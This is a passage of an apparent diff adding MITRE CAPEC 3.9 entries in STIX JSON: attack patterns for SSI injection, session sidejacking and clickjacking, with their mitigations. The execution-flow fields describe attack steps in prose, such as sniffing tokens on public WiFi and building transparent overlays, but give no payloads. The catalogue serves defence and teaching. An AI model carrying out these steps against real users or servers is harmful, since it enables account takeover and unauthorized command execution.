"attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use secure functions not vulnerable to buffer overflow.", + "id": "course-of-action--5549f741-7e5e-4f04-86bd-90dceb9c0de9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--394fe1bb-8b4d-4638-b4e8-2a5719efe438", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5549f741-7e5e-4f04-86bd-90dceb9c0de9", + "spec_version": "2.1", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If you have to use dangerous functions, make sure that you do boundary checking.", + "id": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--774c708f-2480-4cee-8e04-c42d603760e8", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "spec_version": "2.1", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. 
Unless this provides automatic bounds checking, it is not a complete solution.", + "id": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d04362e0-439c-40a1-bfa2-cbddb7b33bbd", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "spec_version": "2.1", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use OS-level preventative functionality. 
Not a complete solution.", + "id": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7aae34f4-823f-43ac-90e9-fa33251c4236", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "spec_version": "2.1", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software.", + "id": "course-of-action--61ed4ed4-15a0-4d2a-b38c-482bf5e682a5", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7f190864-e6a8-45f8-af58-75124f4f4914", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--61ed4ed4-15a0-4d2a-b38c-482bf5e682a5", + "spec_version": "2.1", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.", + "external_references": [ + { + "external_id": "CAPEC-101", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/101.html" + }, + { + "external_id": "CWE-97", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/97.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "SSI Injection", + "external_id": "36", + "source_name": "WASC", + "url": "http://projects.webappsec.org/SSI-Injection" + }, + { + "description": "Server-Side Includes (SSI) Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-610", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.html" + } + ], + "id": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "modified": 
"2021-10-21T00:00:00.000Z", + "name": "Server Side Include (SSI) Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--5a33bee7-5ec9-4e75-9bf6-99fdaca8699c" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Consider a website hosted on a server that permits Server Side Includes (SSI), such as Apache with the \"Options Includes\" directive enabled.\n Whenever an error occurs, the HTTP Headers along with the entire request are logged, which can then be displayed on a page that allows review of such errors. A malicious user can inject SSI directives in the HTTP Headers of a request designed to create an error.\n When these logs are eventually reviewed, the server parses the SSI directives and executes them.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine applicability: The adversary determines whether server side includes are enabled on the target web server.

  2. Techniques
    Look for popular page file names. The attacker will look for .shtml, .shtm, .asp, .aspx, and other well-known strings in URLs to help determine whether SSI functionality is enabled.
    Fetch .htaccess file. In Apache web server installations, the .htaccess file may enable server side includes in specific locations. In those cases, the .htaccess file lives inside the directory where SSI is enabled, and is theoretically fetchable from the web server. Although most web servers deny fetching the .htaccess file, a misconfigured server will allow it. Thus, an attacker will frequently try it.

Experiment

  1. Find Injection Point: Look for user controllable input, including HTTP headers, that can carry server side include directives to the web server.

  2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.

Exploit

  1. Inject SSI: Using the found injection point, the adversary sends arbitrary code to be inlcuded by the application on the server side. They may then need to view a particular page in order to have the server execute the include directive and run a command or open a file on behalf of the adversary.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A web server that supports server side includes and has them enabled", + "User controllable input that can carry include directives to the web server" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Determining whether the server supports SSI does not require special tools, and nor does injecting directives that get executed. Spidering tools can make the task of finding and following links easier." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to be aware of SSI technology, determine the nature of injection and be able to craft input that results in the SSI directives being executed." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them", + "id": "course-of-action--64214f54-8438-43c3-8052-8927af7d98bc", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-101-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3428ab3f-34a5-436a-98f2-9be0a5397f94", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64214f54-8438-43c3-8052-8927af7d98bc", + "spec_version": "2.1", + "target_ref": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive", + "id": "course-of-action--8dc4376f-e920-42a2-9578-575c37c7c146", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-101-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6c9bb040-3574-49f1-bec3-723afe52faa1", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8dc4376f-e920-42a2-9578-575c37c7c146", + "spec_version": "2.1", + "target_ref": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Server Side Includes must be enabled only if there is a strong business reason to do so. 
Every additional component enabled on the web server increases the attack surface as well as administrative overhead", + "id": "course-of-action--c52aed3b-1355-42cd-a2a4-3c570d0f5c35", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-101-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c92c5203-00ee-424c-a58b-d36d36695f03", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c52aed3b-1355-42cd-a2a4-3c570d0f5c35", + "spec_version": "2.1", + "target_ref": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. 
Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.", + "external_references": [ + { + "external_id": "CAPEC-102", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/102.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-523", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/523.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + }, + { + "external_id": "CWE-614", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/614.html" + } + ], + "id": "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Session Sidejacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The attacker and the victim are using the same WiFi public hotspot. When the victim connects to the hotspot, they has a hosted e-mail account open. 
This e-mail account uses AJAX on the client side which periodically asynchronously connects to the server side and transfers, amongst other things, the user's session token to the server. The communication is supposed to happen over HTTPS. However, the configuration in the public hotspot initially disallows the HTTPS connection (or any other connection) between the victim and the hosted e-mail servers because the victim first needs to register with the hotspot. The victim does so, but their e-mail client already defaulted to using a connection without HTTPS, since it was denied access the first time. Victim's session token is now flowing unencrypted between the victim's browser and the hosted e-mail servers. The attacker leverages this opportunity to capture the session token and gain access to the victim's hosted e-mail account." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Detect Unprotected Session Token Transfer: The attacker sniffs on the wireless network to detect unencrypted traffic that contains session tokens.

  2. Techniques
    The attacker uses a network sniffer tool like ferret or hamster to monitor the wireless traffic at a WiFi hotspot while examining it for evidence of transmittal of session tokens in unencrypted or recognizably encrypted form. An attacker applies their knowledge of the manner by which session tokens are generated and transmitted by various target systems to identify the session tokens.

Experiment

  1. Capture session token: The attacker uses sniffing tools to capture a session token from traffic.

  2. Insert captured session token: The attacker attempts to insert a captured session token into communication with the targeted application to confirm viability for exploitation.

Exploit

  1. Session Token Exploitation: The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An attacker and the victim are both using the same WiFi network.", + "The victim has an active session with a target system.", + "The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.)", + "The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically \"rings home\" asynchronously using the session token" + ], + "x_capec_resources_required": [ + "A packet sniffing tool, such as wireshark, can be used to capture session information." + ], + "x_capec_skills_required": { + "Low": "Easy to use tools exist to automate this attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. 
It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.", + "id": "course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-102-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b42f764-6aa4-4c32-a752-c814178db08c", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4", + "spec_version": "2.1", + "target_ref": "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Modify the session token with each transmission and protect it with cryptography. 
Add the idea of request sequencing that gives the server an ability to detect replay attacks.", + "id": "course-of-action--c2fe43b4-eb82-4bf6-b874-c2d9018c94fe", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-102-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66376c3d-cedd-4a2e-9fd6-1737edda9a5e", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c2fe43b4-eb82-4bf6-b874-c2d9018c94fe", + "spec_version": "2.1", + "target_ref": "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary tricks a victim into unknowingly initiating some action in one system while interacting with the UI from a seemingly completely different, usually an adversary controlled or intended, system.", + "external_references": [ + { + "external_id": "CAPEC-103", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/103.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Clickjacking", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Clickjacking" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-619", + "source_name": "reference_from_CAPEC", + "url": 
"https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking.html" + } + ], + "id": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Clickjacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "\n A victim has an authenticated session with a site that provides an electronic payment service to transfer funds between subscribing members. At the same time, the victim receives an e-mail that appears to come from an online publication to which they subscribe with links to today's news articles. The victim clicks on one of these links and is taken to a page with the news story. There is a screen with an advertisement that appears on top of the news article with the 'skip this ad' button. Eager to read the news article, the user clicks on this button. Nothing happens. The user clicks on the button one more time and still nothing happens.\n In reality, the victim activated a hidden action control located in a transparent layer above the 'skip this ad' button. The ad screen blocking the news article made it likely that the victim would click on the 'skip this ad' button. Clicking on the button, actually initiated the transfer of $1000 from the victim's account with an electronic payment service to an adversary's account. 
Clicking on the 'skip this ad' button the second time (after nothing seemingly happened the first time) confirmed the transfer of funds to the electronic payment service.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Craft a clickjacking page: The adversary utilizes web page layering techniques to try to craft a malicious clickjacking page

  2. Techniques
    The adversary leveraged iframe overlay capabilities to craft a malicious clickjacking page
    The adversary leveraged Flash file overlay capabilities to craft a malicious clickjacking page
    The adversary leveraged Silverlight overlay capabilities to craft a malicious clickjacking page
    The adversary leveraged cross-frame scripting to craft a malicious clickjacking page

Exploit

  1. Adversary lures victim to clickjacking page: Adversary utilizes some form of temptation, misdirection or coercion to lure the victim to loading and interacting with the clickjacking page in a way that increases the chances that the victim will click in the right areas.

  2. Techniques
    Lure the victim to the malicious site by sending the victim an e-mail with a URL to the site.
    Lure the victim to the malicious site by manipulating URLs on a site trusted by the victim.
    Lure the victim to the malicious site through a cross-site scripting attack.
  3. Trick victim into interacting with the clickjacking page in the desired manner: The adversary tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege.

  4. Techniques
    Hide action controls over very commonly used functionality.
    Hide action controls over very psychologically tempting content.
", + "x_capec_extended_description": "\n While being logged in to some target system, the victim visits the adversary's malicious site which displays a UI that the victim wishes to interact with. In reality, the clickjacked page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most certainly undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a", + "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408" + ], + "x_capec_prerequisites": [ + "The victim is communicating with the target application via a web based UI and not a thick client", + "The victim's browser security policies allow at least one of the following JavaScript, Flash, iFrames, ActiveX, or CSS.", + "The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser)", + "The victim has an active session with the target system.", + "The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_skills_required": { + "High": "Crafting the proper malicious site and luring the victim to this site are not trivial tasks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.", + "id": "course-of-action--80867248-4826-45e5-84e9-99e4d1bc07c4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e9b7917-b0c4-4461-93c3-7c9623a1eca8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--80867248-4826-45e5-84e9-99e4d1bc07c4", + "spec_version": "2.1", + "target_ref": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Turn off JavaScript, Flash and disable CSS.", + "id": "course-of-action--a7b45eac-7a77-4462-81b6-3ae5d81528e1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--2c711dc9-c190-43bc-a5e0-02855f1b48e5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7b45eac-7a77-4462-81b6-3ae5d81528e1", + "spec_version": "2.1", + "target_ref": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--591f6f0b-24c7-4594-9450-5a3ca2a41ad7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb", + "spec_version": "2.1", + "target_ref": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to 
